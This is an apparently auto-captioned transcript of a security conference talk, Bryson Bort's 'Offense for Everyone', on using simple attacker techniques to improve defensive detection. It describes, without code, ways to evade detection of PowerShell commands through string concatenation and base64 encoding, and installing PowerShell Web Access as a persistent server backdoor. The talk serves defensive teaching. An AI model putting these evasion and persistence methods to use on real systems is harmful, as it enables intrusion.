Offense for Everyone by Bryson Bort

Now you know it's serious. Who's seen me speak before? So you know what you're in for, right? This is why you're like, "We came up front anyway. He's going to come back and [ __ ] with us in the back." And you're right. I will. Um, so this one I did a little bit differently. I know you all have seen me speak about a lot of different things and this is a lot of content. This is going to like make your eyes bleed which is why we're not going to go through all of it. Yay. He's not going to torture us that way because you're still going to get tortured. I mean you realize that,

right? You're not escaping. So I made this like a workbook which means there is an like I said there's a technical density to this that I encourage you after this talk. I'm going to share the slides and I'm going to make them comment only which means you can ask questions in the live document and um you all know I live on an airplane but I will get to your questions. So you'll be like what time zone are you in? I'm like I have no idea. That's why I'm responding to you. It looks like at 2 am your time. Um but ask questions. And the other part is because you'll all be able to see each

other's questions, so you can kind of have a little bit of a dialogue within my presentation after today. Cool. Very cool. So, I've done a bunch of [ __ ] you know that. So, this was my 23 keynote at here at Bides Tampa. Um, and this goes to my teaching style. I like to use what's called the Socratic method, which is why I encourage engagement. Good content, but great questions make it real. And part of why I structured this like a technical workshop is because we're going to have a discussion through it. The end of the day, answering your questions and making this more accessible is the point. Who in here would consider themselves a hacker?

You can put your hand down. I'm still coming to you. Or you can keep it up. We can make it awkward.

So, why would you consider yourself a hacker? I spend time pentesting as a hobby, as a hobby. Does this mean if I get a picture with you right now, the FBI is going to arrest us? I keep it clean. Okay. So, you ethically pentest. Correct. All right. So, what does pentesting mean to you? Taking advantage of either the human element, so things that aren't correctly configured, or taking advantage of known vulnerabilities. Okay. By the way, I love the soap you use. Thank you for showering. Can't take that for granted with this audience. Okay, nerds tend to kind of skip some of the hygiene sometimes, so it's greatly appreciated when they do. Thank you. One of the more pleasant people I've sat

next to. Delightful smells. Okay, so some of you would do what you consider hacking. There is a difference of there's different kinds of hacking, though. I used to run an AP. There is an ecosystem of specialization into those elements and we're going to be talking through that because what makes one person a hacker? You could have a completely different skill set than somebody else. Does anyone here a social engineer? No, we don't have social skills. I can tell he's kind of raising their hand. Like I don't I don't know what that is, man. You know, you're going back and forth. I could wave at you, too. What? Depends on the day. Are you a social

engineer today? No. Okay. Off the clock. Fair enough. So far, considering how confused I am, I don't know if you're really good at this or really bad at this. It's hard to tell. And so the idea that I had with this one is again I wanted to cover how offense can be accessible to everyone because it's kind of seen as like the mystic dark art. And the people who do it, I don't know if you've noticed this, their egos are not that small. It's kind of a size thing. Maybe they're compensating. The purpose of hacking, the purpose of offense is to make defense better. The purpose of offense is to make defense better. Anybody who is doing

anything otherwise is doing it to serve their own ego. And we don't have the time or the space for that. We don't have it at a personal level because they're insufferable [ __ ] We don't have it at the organizational level because I don't know if you've noticed like we're not exactly winning this race. Anyone feel like they've got cyber security solved? Anybody? Buler? No. Good news is that's called job security. [Music] So what is cyber security? There's no wrong answers except the wrong answers. So you can shot. What is cyber security? No. As a service that is a brand of cyber security. Not a good one. Yes. So I was coming to you anyway when

you raised your hand. You just What is cyber security? Information security.

Okay. You can't use the word in the definition of for the definition. Protecting protecting information. Protecting information. Who would agree with that? Kind of. Why? Why kind of? You you you were doing the Miss America wave. How to secure? Because we have physical. You have obviously your lovely electronic layer here. Uh cell phones. I literally texted half of my friends and said, "Turn your Bluetooth off because there's going to be some [ __ ] today." Um cyber security to me protecting these 16 critical infrastructures as I word it. So protect was the verb I was picking on because protect is half of it. Once protection fails, the inevitable breach, does cyber security stop? No. Is the correct answer. No, it

doesn't. You don't get to say, "Hey, we got breached. I'm out. Time to put in my 30-day update." Oh, Tyler Trey. Who's doing that? Rams. Okay. All right. Well, the ones that touch my hand are extra special. That sound is so creepy. God, this is why I might owe it HR. Defense is measured by the threat. Whatever your definition is, whether it is protection or like I was talking about the detective elements where we were talking about physical access, any of those phases, any of the things you described, the only measure that matters is can somebody else do something to you that you don't want. That's the definition of cyber security. That's why it's so hard. That's why you

have that existential angst in the pit of your stomach. It's not cuz your anxiety meds aren't working. It's cuz your job is hard. Because no matter what you do, you don't actually know if it works, do you? Because you don't get the ultimate vote. There is no ability to engineer and configure security to this level. You, you know, do some things and then you go home on the weekend and hope you don't get called. That's cyber security. And so our job in offense, by the way, who gets the tracksuit joke? What's the tracksuit joke going on here? Threat actors. Threat actors being Russian.

So the Russians actually fund an entire Rams. You had something. You think you know the answer? Uh, heels on ground, comrade found. Heels in sky, American spy. Slav squat, aka the Slav squat, which is named after the Slavic culture. And that is in fact a way that they all hang out. So if you ever see them doing this, that's the Slav squat. They hang out like that. And westerners tend to pop up their heels when they do it. Try it when you do later. Don't do it now. Also, I probably cuz a lot of you do not look like you work out. See a doctor first before you try this exercise at home. Don't sue me.

Just Just sue me for the HR comments, not for hurting yourself. So this is the joke of the Eastern European ransomware gangs which are as we may have noticed quite significant in our problem. So our goal when we are doing cyber security is to be them. The more realistic the safe the way that we can do this the better we can make ourselves because this is the only measure that matters the fish tank. I tell this story a lot because I think it is incredibly valuable. You're going to learn a lot of information from my talk and other talks today and then you're going to show up at work on Monday and you're going to

probably do none of it. Am I wrong? Why? Why is that the case? Cuz you don't have a job.

Can we convince your mom to do it? For those of you who have jobs, which was the implication, why are you not going to be doing this on Monday? Politics. Politics. Who said politics? Tell me more. Politics. Cuz I am not the person who is actually in charge of anything. No. Even though I should be. Do you want another sticker? You could try to give that to your boss. There you go. See if that bribe will help. There's some things I can't fix, folks. But it brings up the point. Not all of us are in charge, are we? And even if you are in charge, you still have a boss. Does your boss buy into this? Nope.

So my point on this is from where you are these this is change management. Any ideas you want to do that are different than the way things are done today means you need to go and communicate and influence and get buy in to get them to let you to do that. That's your challenge. That's the challenge of taking the stuff from today and it being cool in the moment to actually bringing it to Monday. And that's part of why I was trying to push this in this talk as a workbook because I'm going to give you enough to make the argument, but it's up to you to actually convince the leadership of that. And that's why I

like the story of the fish tank. Simple stories. You want to understand the technical level of your boss. How do you talk to your grandmother at Thanksgiving? You think I'm kidding? I am not. That's how you talk to executives. What? Your remote control is not your phone. No, grandma. Your remote control is not your phone. We taught our grandmother what a donkey punch was.

To be clear, I'm the only one who's allowed to make HR violations. Janine, for future reference,

it was Christmas. Most folks just go with the here grandma, here's the phone with really big buttons. That's as far as we go, especially in public. Come on. The point is the things that your grandmother can understand is the level of detail that you should be providing to executives. They don't give a [ __ ] about the detail. Tell me in 30 seconds why, what, and what's why do I care. Stories like this are an easy way to do that. So, the fish tank. In 2015, the Sands Casino in Las Vegas is owned by a man named Sheldon Adlesen. Sheldon decided to have some incendiary commentary about the Shaw of Iran. Turns out authoritarians really don't

like being poked fun at. So, they're like, "We're going to get even." So the Iranian revolutionary guard decided to play a game of sticks and stones do hurt my bones and they wanted to get even. Now the SNS casino is in the finance sector. And if there is anything you can take away from cyber security that has a grain of truth, it's that more money equals more cyber security. More money, more resource, more security. Now whether it works or not, it's a different question. But the chances of just being blanketed into something means you can almost just work by accident. Can you just work in cyber security? I know you both don't have jobs. It's very obvious.

Sorry. So the reason I like the story of the fish tank is there's two aspects. The first is the operations perspective. The Sands Casino said, "We want a multi-million dollar fish tank." You have in your organization, the equivalent of our operations or the business says, "We want this thing." And you're like, "Why? It's the stupidest thing I've ever heard of." Well, guess what? Your culture of no doesn't count. You get to deal with it. Well, in this case, they like it because it gives an ambiance so that high rollers will spend more money. Now, I only did a couple of years of lifeguarding as a teenager, but I know that clean water is better than dirty

water, and fish do better in clean water. So, we need to keep them alive. Dead fish, I don't think, get the high rollers bedding. Just a guess. So, we need to be able to keep this water clean. And I'm not paying somebody to sit there and dipstick it every hour, which means I need to have a remote sensor. Now, do you think the people who are running the fish service have sophisticated cyber security or do we think they have their cousin Gary who runs everything cuz he knew how to fix grandma's phone at Thanksgiving Janine. And yeah, so we got our cousin Gary who's doing this. Now Gary's doing his best, but Gary's not an expert. So we now have our way

in. Now, wouldn't you know it that accessing that IoT sensor in that fish tank also coincidentally had access into the core network and $50 million of damage later? 50 million. What's the lesson learned? Is the fish tank an important asset by itself? That financial information was though. And so it's the connections, it's the relationships, it's the dependencies to things that we don't consider important that are the prime surface area for initial access to cause those kinds of issues. That's a story that your folks can understand because you have a fish tank in your organization whether you know it or you don't. Who knows what virus total is? you know part of it. So what's that?

Okay. So virus total. What's happening here? Can you even see it? Not really. I didn't issue the binoculars. Okay. So what we have here is PS exec PSe service being invoked which means a tier one highly trained analyst is like I'm seeing an executable that looks bad. Let's throw that in a virus total. For those of you who were in Trey and Tyler's awesome talk just a couple of hours ago, wave your hands, gentlemen. We talked about the fact that executables generally get announced in the environment. Somebody's going to do something about it. Some analyst is going to get involved. But PowerShell is a Microsoft signed binary. It is a part of the woodwork. It's built into the

kernel. So when I put that up there, what we see, of course, is everybody saying it's benign. Close ticket. Good. Are we good? Well, we don't know actually. Maybe, maybe not. But certainly that level of attention to detail is not a good one. The fact that they don't know what PowerShell is is actually a common problem. Fact that they don't know how to look for bad PowerShell is a problem. Right? We have a training deficiency. The technical part of our detection framework worked. The human part failed potentially.

It's saying I hear it beeping, but nothing is happening. Beep. There we go. You did that, didn't you? Yeah. Okay. So, we're no longer using this.

So there's different ways to call PowerShell, right? There's the first, the obvious. I can do a string call to just the executable that's there. How easy is that to detect? How easy is that to detect, audience? Extremely easy. Thank you. I can make the cues more obvious if necessary. Or I can start picking out people to use as an example. You like that one, don't you? And you're like, "It won't be me." It probably will be. So, we all know that's easy, which means we need to obuscate it. And the challenge is obfuscation doesn't even have to be clever. The example I have on there is I just did a string declaration of two variables and concatenated them

for the call. Guess what? Your string check won't get that sophisticated AP. It works. It works. And so the idea here, one, the way I want you to think about this is starting with we need to take the basic calls to PowerShell off the table, right? That's our initial defense. And it's not easy because you're already naturally using PowerShell in your environment. It has it's everywhere. Your IT uses it for management. And so the trick is where can we correlate where they're using it from somebody that shouldn't be? and then looking at those behaviors of what they're doing because it's not just even establishing the initial visibility of a call. It's starting to look at well typically we're seeing

PowerShell being used to push patches. We're seeing PowerShell being used to do a local machine administration. We don't see PowerShell then sending something over DNS. That's probably a little weird. those kinds of connections, those micro emulations where we're seeing behavioral patterns put together. That's the level we want to start piecing together. But it starts with establishing the initial visibility of PowerShell. So, this is the offensive maturity model that we put together. We published it about five years ago and we've been um maintaining it. Um if you saw Trey and Tyler's, they turned this into a pyramid. But here are the takeaways. The first thing I want you to understand when we look at this is vulnerability

scanning, vulnerability assessment and penetration testing on the left side. That is a system view. So the definition I'm using for penetration testing here is unauthorized system access, not the compliance of pentesting which can be a broad definition. So for here it's just how do I break onto a system, right? Kind of like what you were talking about your hobby. You look at how do I get there? That's a system view. Is your enterprise a system? What is it? It's a system of systems, which is where we get to the right side. If you are not thinking in a system of systems perspective, which is what the fish tank story starts to highlight that imagination, you're missing out. And so

the recommendation here is start with the purple teaming concept as that initial step. So for the offense we're going to be doing, start with a purple team to do it. You all graduated first grade. I think some of you maybe not. And you know that red plus blue is purple. First thing I want to do get out of your head. You don't need a red team to do this. That's the whole point of the class we're going to be teaching today is how do you get a red capability? All I need is to be able to demonstrate adversarial techniques and it doesn't have to be sophisticated. Right? And I gave you an example of just

concatenating a string is obfuscation. That's sophisticated. Whatever works is the point. Starting simple is the point. Again, since cyber security is defined by the offense, we need to make offense more accessible to all of us in here. So I don't need to be running cobalt strike. I can do simple commands to be able to accomplish that and learn from it. And so doing that in a transparent manner is the best starting point. Collaborate on the scope. Collaborate on the techniques we're going to do. Collaborate on the business objectives. Execute it together in a milestone fashion. Like let's run a command. Let's see what we see. Let's circle back on that. Let's put a detection in place. Let's check it

again. Doing that together is the best system of system starting point. grow and earn your way to the red team where you have a human operator who can come in and use fish tank imagination to basically still own your active directory drop and leave and then give you a shitty report. So how do I do that? There are three components to an exercise scope. Where are we testing this? Is there value to conducting a risk assessment on a single machine?

Where' the yes come from? There's I'm like looking into the light. So I can only like tell like general direction. Yes. If the machine is a single point of failure or critical system, it absolutely makes sense to conduct a risk assessment. What if it's not critical? Depends on what it has access to and what it does. Okay. or if it's representative. Thank you, Brandon. Because I can check my gold images, can I? There is value to looking at what my gold image sees and doesn't see. There's value to what my gold image stops and doesn't stop. There's value to seeing what apps do what. So, that whole I need to have, you know, the the pathy response typically that

you'll hear from red teamers is adversaries don't have scope. Well, guess what, [ __ ] I work at a business and I need a scope because otherwise we get fired. So it is absolutely valid to start with a machine. Now there's limited value I can get from a machine but there's not no value. The more I can include, the more I can test. But now I've made it harder on myself, right? So this is part of why we start simple complexity. Technical complexity is what's the level of the threat that I drive? Do I need to start with something sophisticated? No. And that's what we're going to cover today. We can start with simple things. And then the frequency.

How often do I do these exercises? There's no answer. It has to be what fits you. There there ways to do this at a higher or lower level. Sorry, it's not completely interactive. It's just like higher and lower levels, right? So maybe I don't need to do a full like bring everyone around the table to do a purple team exercise. Maybe there's value in us just sitting down and doing like micro tests on the configuration itself. That's still valuable and it doesn't cost as much, right? Why not spend a Friday afternoon or a lunch just tackling the gold image? Send it whatever things you can think about, right? You don't need approval to do that. All you need is the ability to

just drive a little bit of offense. Okay. So, I came up with this because back when I was AP, I was surprised we always won. And then when I went into the commercial world, I was like, "Oh my god, this is like shooting fish in a barrel. This is so easy." And so I was like, why do we always win? And the reason for it, right, we talked about cyber security isn't solved. Well, that's because if we look at the entire attack chain, it's infinite, right? It starts with reconnaissance. I need to build a target package, right? Half of every Oceans 11, 12, 13, and 8 movie is putting the team together and building the dossier. The actual theft itself is

pretty short. Then here's where we get hung up as an industry. Initial access, the initial pen test. All I did was get in. In fact, how much of getting in is even technical? Not a lot. It's why we talked about the social engineering earlier. Is fishing technical? No. It's using email the way email was designed and a user clicks on email the way it was designed. If that burns your enterprise to the ground, that's your fault, not the user. So we as an industry though because we are people who make these decisions, right? We were talking earlier, the change we need to happen on Monday is requiring a boss, is requiring leadership buyin. Well, those same leaders have the same

psychological weakness that we all do. Who doesn't want to keep the mask intruder out of their own house, right? Who doesn't want the lock to work, the barbed wire to catch them? These sharks with laser beams swimming in a moat around your house working.

Janine, you can donkey punch him if you want. The psychology is we try to keep them out which is why I talk to CESOs and I will be like right we talk about assume breach assume they already got in. We talk about the fact that prevention inevitably fails. Any determined threat will break into your enterprise guaranteed. I don't care what scenario you have. It is beatable. Everything is fallible. And again, as we've already covered, it's only partially technical. Your people are the largest risk surface area and they never change and they never will. And so I get them all to agree to that and then I look at their budgets and 95% of their budgets are on prevention. How

do I make the walls higher? How do I solve all the vulnerabilities? Vulnerabilities are third on the list for initial access. Vulnerabilities are not the most common way in back to the exercise. So I can't really reduce your reconnaissance. I can never really stop you on initial access. But even so, who cares? All initial access is a shell call back. I'm on your computer. Cool. I haven't done anything to you yet. Which is why the actions on objectives is the most important part. That's where we see the greatest organizational impact because that's where the thief makes the proverbial money. I'm ransomware. I move laterally as quickly and as far as I can. I lock everything and then I extort

you. That's where you care. That's the moment you care. How do you stop that earlier?

So that means we need to test. We need to make sure things work because what we're evaluating is the portfolio management, the technical and the human elements, not only of the users but of the security staff. Right? Back to that virus total example. We need to see that our sock analysts actually are trained to the level that we're doing because you can do everything right right in that instance. PowerShell alerted went to the analyst and the analyst threw it in virus total and closed the ticket. We lost. That's the level we need to be evaluating. Next slide. So cyber threat intelligence, it's all [ __ ] That's it. I'm done. Why is it [ __ ] So we spend globally

10 to 11 billion as industry on cyber threat intelligence and 90 to 95% of that spend goes to three things. The bottom of the pyramid of pain bad IP bad hash bad domain because those are easy and more importantly they're machine readable. It's a static value that I can import into a firewall. It's a static value I can import into an EDR. It's a static value I can import into an AV. But from the threat perspective, it's table stakes because how easy is it to change any one of those things? Trivial, which means your defense is catching six months ago and the threat has already moved on. if this is the table stakes that you're already getting. But of

course, that's where you're like, "Well, Bryson, that's where the really flashy analyst reports come in, right? Who's read the 20 to 40 page reports that go into all the detail of exactly what the threat did, what their thinking was, what the techniques they used were? Those are really cool, right? How do I take that and do something with it, though? I mean, I can print out the report and like put it on top of a server and some reason nothing happens. like the server can't read the paper, right? We have to turn that into behavioral components. We have to return that into actions. Those are the signals we need to drive into the environment. So, let's get on the same definitions.

What is a threat? So, it starts with a motive. Me waking up in Moscow, drinking a fifth of vodka, and being angry at you is a motive. How far does that go, though? About as far as I can throw the bottle. doesn't really affect you over here, does it? Until we add capability. So, I take that anger, that motive, that desire, that tracksuit and I take capability now and I can do something. I need tools. I need initial access. I need infrastructure. I need operators who are trained on tradecraft. Go Google Conti Tradecraft and you will see where we actually this is really cool because we have the Conti operator playbook. Like this is where their

operators actually had like a guide that like what to do at certain moments. That's the threat. But here's the cool part. So we had an expression in the intelligence community. I can't create an asset. I can't go up to you and make say you will betray your country. You'll turn me into the FBI. However, I find out that you're getting divorced. I find out you have a gambling problem. Find out you're hooked on heroin. I can tell these all these things just by looking at them. And now I have an opportunity. You've created surface area I can exploit. This is the part of us we control. We, the blue team, we the organization are not defenseless. What we have is what is

needed to be taken advantage of. Don't worry, I didn't bring any viruses from the Middle East. You're safe. Just coughing. Or am I? That combined is the threat. Nope. Next slide. No, it's cool. So, my buddy Casey Ellis is the co-founder of Bug Crowd. For those who don't know Bug Crowd, they're a bug bounty program. So, it's where you can do hobby pen testing, sign up, and break into things and get paid for it. A threat actor is someone who wants to punch you in the face. The threat is the punch being thrown. The vulnerability is your inability to block the punch. And the risk is your likelihood of getting punched in the face. How many of you

feel like high school? Now, next slide. Now, thank you. So, our goal is the top, right? We've covered this. We're not interested in the simple things. We're interested in the behavioral components because the really cool thing I can tell you, you will never ever ever ever ever ever stop a zero day. Anyone who promises you is lying. But it doesn't matter anyway, right? We go back to the BAM model. That's just how I get in. What I do next, you can in fact catch. And if you focus on these techniques over time, you will catch campaigns that have never been seen before because there's going to be an attack logic collision. they will end up

at a place that you've already tested and you got them because there's only so many things I want to do and only so many ways I can do it. So, some more vulnerability. A vulnerability is a type of opportunity. Everyone get that because those get mixed up a lot, right? A vulnerability is just a mistake I can take advantage of. Exploit is the code to take advantage of that mistake. And a threat is where I combine that with human intent because until AI takes over the world, it's still humans doing all of this [ __ ] to you. And that's what they look like. This is what's so interesting about the field you're in. Everything else in the

business is a local problem. Pretty much you in here are up against military and intelligence units from nations that wish us harm. That's your threat. those ransomware gangs funded, sponsored and supported by adversarial, intelligence, and military organizations. Crime has been taken into this as well. This is why your job is so hard. Has anyone seen the estimates on the number of PLA cyber operators that they we think they have? Anyone want to guess how many? thousand 10,000 100,000 is the current estimate in one country. And by the way, that was an estimate from last year, so I'm pretty sure it wasn't static. You are up against over a 100,000 operators just from the Chinese PLA.

Yeah, I know. Next slide. So, here's how we're gonna do threat intelligence for free. Everyone knows MITER attack, right? I'm required to say it or MITER finds me. Don't worry, I'm going to tell you how it's [ __ ] in the next slide or bull crap. So, off of that, they have a groups page. Go to the groups page. Just do a plain text search on that web page for your industry or your location or whatever. In this case, I just typed in defense industry and it will text match with every single group that has been known to be to have done that. And you can go in and see historical campaigns. You can see the tooling they used and

you can see all of the techniques. Now, the thing that's missing from that is they don't give you the order of battle like how actually the logic worked, but it's a great starting point for now you know, well, these are the things they were doing and this is how they did it. You've now just got your technical complexity given to you because you just have to copy that and then grow your own sophistication in the way that you do it. Next slide. So miter attack. Why is MITER attack? Why am I picking on it? It's a lot. It is a lot. That isn't even all of it. I think there's currently what like 1,250 techniques.

1,250 techniques. that isn't even the complete corpus of the way to do all these things anyway. The number is greater than 1250 but that's just what attack has right now. The problem I have with MITER attack is it's brilliant and it's right and the value it gave us when it was first came out in 13 and then got publicly used really about 2018 is when it started to catch critical mass is it gave us in the industry a common vocabulary to be able to talk about the problem. Before that I'd say like I did credential theft and Tyler would be like I did too but I think I did it differently. Now we have a common lexicon of

vocabulary where we now know each what we're doing. So when we're doing these exercises, we have a way to share what we're doing in a way that we all understand. But like anything that's right and is brilliant, it's been abused. All models are wrong. Some are useful. The problem we have here is you now have a bunch of tools that have turned this into a bingo card. Let's see how I do on modify registry. Checklist. Checklist. Checklist. Checklist. I'm green. We're done. Nobody will ever be able to do that to us. Not true. Here's how I want you to think about it. Just like we have a periodic table to describe the real world, that's what this is. This is a periodic

table that describes the individual elements of an attack. And just like in the real world, it takes a unique combination of those atoms to create a particular thing, right? Wood is made of carbon and hydrogen and I don't know what else. I just making those up. I'm not even sure it's in those, but carbon is like in everything. So, it's the same thing for here. The order of these things happening changes the chemical equation. I didn't steal credentials to high-five around Moscow. I stole credentials. I stole credentials because I'm a user on an asset in a particular instance. And what I do next is going to look different at the host and the network level based on that I

have those credentials now. Which by the way, now that you're hearing this out loud, right, is why the blue team needs to be focused on that because if I'm not looking at the state basis, your detections are wrong. And any of you who have used a tool that turns this into a bingo card, I assure you, show up with a real emulation and you will find you have built nothing. Which is why it is so important that we understand how to use this correctly. So that's where we get into simulation versus emulation. So highlight here because we're I wanted to get to more fun things. We have out of time. Simulation is me doing an exact thing

that has immediate value. That has threat hunting value. If that is information I get in the middle of that being an activity we're seeing in industry, then good. I can find that exact thing and I can see what is happening to me. But as we've already covered, the adversary is going to change and move on. Which is why we then want to focus on emulation, which is the behavioral components. The variability of that behavior tied to different communication protocols is going to have a different look. That behavior tied to different levels of user access is going to look different. That's the level we want to get to where we're behavioral at the emulation level to start catching

tomorrow. Next slide. So, the easiest way to get started and do this is Atomic Red Team. Who has not heard of a atomic red team? It's right on the slide. What do you mean? Can lead a horse to water. Seriously, it's picking on you. So, again, workshop level. This is the install command. it will go out pull out the latest version of Atomic Red Team. It will start an instance in your um command line and now you're able to execute atomic tests. The idea here is back to taking miter attack. You don't have to know and go and look up the individual components of how to do a technique or a procedure. All you have to do is say I want to do

that part of a miter attack and it'll automatically pull it and do it for you. This is a free tool by Red Canary. Um, keep in mind it's community- based, which means you want to look at the code before you run it. Be safe. Test before you do something. But an easy offense for anyone way to get started to actually being able to drive. I mean, their library has over a thousand items in it right now. So, it's anybody can run it. It's easy to do. Next slide. Next slide. So, now we're going to talk PowerShell. Next slide. These things are fun, aren't they?

No. Put it up again. We're already there. So, there is a debate in the infosc community. I know. Big surprise. We debate everything. I think if you have two infosc people, you have at least five opinions. And one of them is why do I care about PowerShell? It's everyone gets it. everyone. And yet here we are and it still works and no you don't. And it is an it is years of work to just probably get PowerShell at a level where you're comfortable with it to work. And so and when we look at what the threat is doing, the threat is using PowerShell. Therefore, that's where we want to go. So don't get into the celestic debate of

that's too easy, that doesn't matter. It matters. If it works, it matters. If it can be done, it matters. Next slide. So what we're going to cover in this part is encoding unmanaged and that's probably I'll skip to PowerShell web access because I did come up with a unique persistence mechanism um when I first put this together. Um I was so surprised what I did. I'm like wait did I really find this? And I shot Trey a message. I'm like does this do what I think it does because I am so sleepd deprived right now. I'm not sure. And Trey was like no I think we just came up with a novel persistence method. So

you're going to find something that nobody else has seen. Next slide. All right. So offense, right? Um Tyler covered this in his talk, but in short, back to my obfiscation level, there's this idea called B 64 encoding, which just takes a string and turns it into gobbledegook that a computer can automatically figure out. If you're not looking for that kind of thing, guess what? Again, you're not going to even detect it. So understanding that this is a method is important. Note, there are other ways to do this, right? We covered some of them. There was a GitHub link in the first slide. In this slide, um I have a link to a um obfiscator. So you

can now use that in your engagements as you grow the complexity to bring automated obiscation into the testing that you do. Next slide. So unmanaged PowerShell. Um Tyler and Trey covered this briefly as well. You aren't trying to win. What you're trying to do is increase the probabilities that you can find something before it can cause any impact to your organization. Which means partially how do we make it more expensive to hack us? How do we impose cost on the threat? Your goal is to take away the living off the land of PowerShell and other binaries and scripts that are already organic to your environment and force the threat to have to build their own code and bring that

to you. unmanaged PowerShell is that, right? If I take the living off the land PowerShell from you, you now need to bring your own code to be able to get that same functionality. You're more expensive. And the more code and the more actions a threat takes, the more visible they are, the easier it is to detect them. That's where we're trying to get is that imposition of cost to improve our chances. Skip that. skip that. Okay. So, this was an expo uh um something that we found and on Windows server um there is a particular version of PowerShell called PowerShell web access which was meant for a administrator to be able to remote in and do things on in

the server environment. Most servers don't have the same level of protections and detections because we're not trying to influence the functionality of the server. This is a server because it's providing an entire business function which means we tend to put less on it and we try to protect around it. And what we found is that with this version of PowerShell, if I install it, you're probably not looking for that. And the best part about it is it provides a back door which means if you find me and you delete me I can still come right back. That was the novel persistence method we found on Windows 12 2012 servers and up is that this functionality can be

installed and provides a permanent backd dooror into the environment. Next slide. Next slide. Next slide. Next slide. Next slide. Next slide. Next slide. Yes, it is on Linux. Press the button again. Or Mac. Did you know that you can get PowerShell on Linux and Mac? So, it was a rhetorical question. So, so Windows is where we tend to think of just PowerShell. My point here is every computer in your environment potentially is open to this tool. I can install it. You might already have it. It might be built into the kernel. Another thing to consider is software. Disabling something does not mean it can't be turned back on. So, don't just take do the takeaway of,

okay, Bryson, we're Mac shop. I don't have to worry about PowerShell. Every operating system known to humankind has the ability to have PowerShell installed on it. You are not limited to just the Windows environment. Atomic Red Team. So that free tool I showed you earlier off the web page, you can just text search and it will give you all of the PowerShell commands that are mapped to all of the MITER attack framework. I know. Great. Yeah. Now I again we don't have to make this hard. There is a corpus of information where I can just text search, copy, paste, and you are now an AP. You're welcome. Get permission first. Right? We covered that. Next slide.

All right. We covered this earlier and I didn't didn't pick on it because I really wanted to highlight it here. They're actually only two classes of controls in your environment. preventative, which physical comes under preventative and detective. We covered earlier the psychology of the preventative control. We are hung up on it because we want to be able to stop something bad from happening. We've already covered you can't and it's not even where the bad thing happens. The dirty secret of cyber security is 99% plus of your defense is prevention. I'm sorry, is detection. Detection. One of the reasons for that is because prevention is hard to do correctly. How many of you have tried to do

something legitimate and the security tool stopped you? All of you have had that happen. Now, when it happens more than once, what happens? You start getting angry and you've now just created the best hackers in the world because when you get in way of an employee with that culture of no, they cut out your control. they delete this the problem. You can't block something that's legitimate and no vendor can do that. Crowd Strike is probably one of the best tools out there and they can't tell you how you use something in your environment. It's contextual to you. You are in fact a unique unique snowflake. It's true. Your security is which is why detection is so important because

detection doesn't stop something. Detection brings a human in the loop to go, okay, something has happened. Now I make a educated, hopefully educated call on what to do. This is most of your defense. And if you're not driving these signals to test that and to improve that, you're missing it because threat intelligence going into your prevention isn't going to cut it. It's what we do next. And that's why offense for everyone needs to be the accessibility to drive your own signals on your own time. Next slide. Next slide. Next slide. Next slide. Next slide. Next. Go back. I was testing you. So visibility. An AP will beat you on a host all day long. Why?

What's that? They're already in there. Yeah, but once I'm there, why can I beat you on a host? Living off the land. So, I'm blending into the trade craft of what you have right there. I look like a legitimate thing because I am a legitimate thing. You can't win on a host. You can win on the network because I can't defeat the laws of physics. I go to a one and a zero in the protocols you define in your environment like everything else does. You now need to correlate that to find me. Next slide. Next slide. Next slide. Next slide. Next slide. Another free tool I put out with George Orchas and Adam Ashinci. Um so for those

of you who are looking for more sophisticated offensive tooling, we cataloged over 150 tools that are available in the world. Um, we also collaborated with the SANS Institute to put out a Kali Linux distro called SAS Slingshot. So, a number of those and blue team tools are already installed for you. It's a free Linux distro. Next slide. Next slide. Okay. Oh, my QR code didn't make it. All right. Um, so I do a bunch of things in the community and I have a bunch of projects that I'm kicking off here locally. Um, one of them is we're doing an OSEN project. um looking at citizen attitudes on cyber security and national security and a couple of other things.

If you're interested in working with our volunteers, sign up. You'll get a free pizza party with me at some point. And that is the presentation. Thank you. I'll be here all afternoon. [Applause]